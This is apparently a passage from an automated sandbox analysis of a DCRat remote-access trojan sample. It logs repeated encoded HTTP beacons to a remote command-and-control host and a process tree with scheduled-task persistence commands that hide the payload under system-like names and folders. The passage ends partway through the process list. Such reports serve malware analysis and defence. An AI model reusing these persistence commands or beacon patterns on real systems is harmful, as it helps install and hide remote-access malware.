            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65
            Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            16192.168.2.449753141.8.192.26807992C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            TimestampBytes transferredDirectionData
            May 24, 2024 11:08:35.439461946 CEST2134OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED]
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            May 24, 2024 11:08:36.131242037 CEST264INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:08:36 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 104
            Connection: keep-alive
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65
            Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            17192.168.2.449754141.8.192.26807992C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            TimestampBytes transferredDirectionData
            May 24, 2024 11:08:42.357044935 CEST2132OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0Z [TRUNCATED]
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            Connection: Keep-Alive
            May 24, 2024 11:08:43.040803909 CEST264INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:08:42 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 104
            Connection: keep-alive
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65
            Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            18192.168.2.449755141.8.192.26807992C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            TimestampBytes transferredDirectionData
            May 24, 2024 11:08:48.067573071 CEST2158OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED]
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            Connection: Keep-Alive
            May 24, 2024 11:08:48.759102106 CEST264INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:08:48 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 104
            Connection: keep-alive
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65
            Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            19192.168.2.449756141.8.192.26807992C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            TimestampBytes transferredDirectionData
            May 24, 2024 11:08:53.771653891 CEST2134OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED]
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            May 24, 2024 11:08:54.474562883 CEST264INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:08:54 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 104
            Connection: keep-alive
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65
            Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            20192.168.2.449757141.8.192.26807992C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            TimestampBytes transferredDirectionData
            May 24, 2024 11:08:59.485892057 CEST2158OUTGET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnV [TRUNCATED]
            Accept: */*
            Content-Type: text/css
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
            Host: a0985701.xsph.ru
            Connection: Keep-Alive
            May 24, 2024 11:09:00.170661926 CEST264INHTTP/1.1 200 OK
            Server: openresty
            Date: Fri, 24 May 2024 09:09:00 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 104
            Connection: keep-alive
            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 43 4d 34 51 44 5a 79 63 6a 4d 7a 41 44 4e 33 51 44 4f 35 59 57 5a 31 41 54 4e 34 4d 54 5a 34 4d 47 5a 34 55 7a 59 68 64 44 4e 6a 4a 79 65 36 49 53 4f 6a 42 7a 4e 6a 52 32 59 79 55 7a 4d 32 6b 7a 4d 6c 56 57 4e 35 51 7a 4e 34 45 54 4f 35 51 47 4d 31 59 7a 59 30 49 47 4e 31 49 79 65
            Data Ascii: ==Qf9JiI6ICM4QDZycjMzADN3QDO5YWZ1ATN4MTZ4MGZ4UzYhdDNjJye6ISOjBzNjR2YyUzM2kzMlVWN5QzN4ETO5QGM1YzY0IGN1Iye


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:05:06:56
            Start date:24/05/2024
            Path:C:\Users\user\Desktop\N0tepkRPzw.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\N0tepkRPzw.exe"
            Imagebase:0xd50000
            File size:1'806'983 bytes
            MD5 hash:4B173AAA031DE977353CA903F23520E4
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:1
            Start time:05:06:56
            Start date:24/05/2024
            Path:C:\Windows\SysWOW64\wscript.exe
            Wow64 process (32bit):true
            Commandline:"C:\Windows\System32\WScript.exe" "C:\bridgeportserver\u0vIoi.vbe"
            Imagebase:0xfb0000
            File size:147'456 bytes
            MD5 hash:FF00E0480075B095948000BDC66E81F0
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:moderate
            Has exited:true

            Target ID:2
            Start time:05:07:03
            Start date:24/05/2024
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\system32\cmd.exe /c ""C:\bridgeportserver\8nlgr42PAYPKgwQGCAUD8OnyAwE.bat" "
            Imagebase:0x240000
            File size:236'544 bytes
            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:3
            Start time:05:07:03
            Start date:24/05/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7699e0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:4
            Start time:05:07:03
            Start date:24/05/2024
            Path:C:\bridgeportserver\blockServerruntime.exe
            Wow64 process (32bit):false
            Commandline:"C:\bridgeportserver\blockServerruntime.exe"
            Imagebase:0x90000
            File size:1'257'984 bytes
            MD5 hash:A6A0FB77338508B4185FE94263AA2D0F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1737024457.000000000287F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1737024457.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1739105133.00000000124DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 100%, Avira
            • Detection: 100%, Joe Sandbox ML
            • Detection: 88%, ReversingLabs
            • Detection: 68%, Virustotal, Browse
            Reputation:low
            Has exited:true

            Target ID:5
            Start time:05:07:04
            Start date:24/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 5 /tr "'C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:6
            Start time:05:07:04
            Start date:24/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:7
            Start time:05:07:04
            Start date:24/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 11 /tr "'C:\Windows\Provisioning\Packages\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:8
            Start time:05:07:04
            Start date:24/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 13 /tr "'C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
            Imagebase:0x7ff71e800000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:9
            Start time:05:07:04
            Start date:24/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:10
            Start time:05:07:04
            Start date:24/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 8 /tr "'C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:11
            Start time:05:07:04
            Start date:24/05/2024
            Path:C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe"
            Imagebase:0x110000
            File size:1'257'984 bytes
            MD5 hash:A6A0FB77338508B4185FE94263AA2D0F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000B.00000002.1829037746.0000000002471000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Antivirus matches:
            • Detection: 88%, ReversingLabs
            • Detection: 68%, Virustotal, Browse
            Reputation:low
            Has exited:true

            Target ID:12
            Start time:05:07:04
            Start date:24/05/2024
            Path:C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe"
            Imagebase:0x4a0000
            File size:1'257'984 bytes
            MD5 hash:A6A0FB77338508B4185FE94263AA2D0F
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000C.00000002.1828726317.0000000002811000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            Reputation:low
            Has exited:true

            Target ID:13
            Start time:05:07:04
            Start date:24/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 10 /tr "'C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:14
            Start time:05:07:04
            Start date:24/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:15
            Start time:05:07:04
            Start date:24/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 8 /tr "'C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:16
            Start time:05:07:04
            Start date:24/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:17
            Start time:05:07:05
            Start date:24/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoe" /sc ONLOGON /tr "'C:\Users\Default User\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:18
            Start time:05:07:05
            Start date:24/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "qVUjshNEHYUOCXyHyUMQwFlZoeq" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Favorites\qVUjshNEHYUOCXyHyUMQwFlZoe.exe'" /rl HIGHEST /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:19
            Start time:05:07:05
            Start date:24/05/2024
            Path:C:\Windows\System32\schtasks.exe
            Wow64 process (32bit):false
            Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\addins\RuntimeBroker.exe'" /f
            Imagebase:0x7ff76f990000
            File size:235'008 bytes
            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Has exited:true

            Target ID:20
            Start time:05:07:05
            Start date:24/05/2024
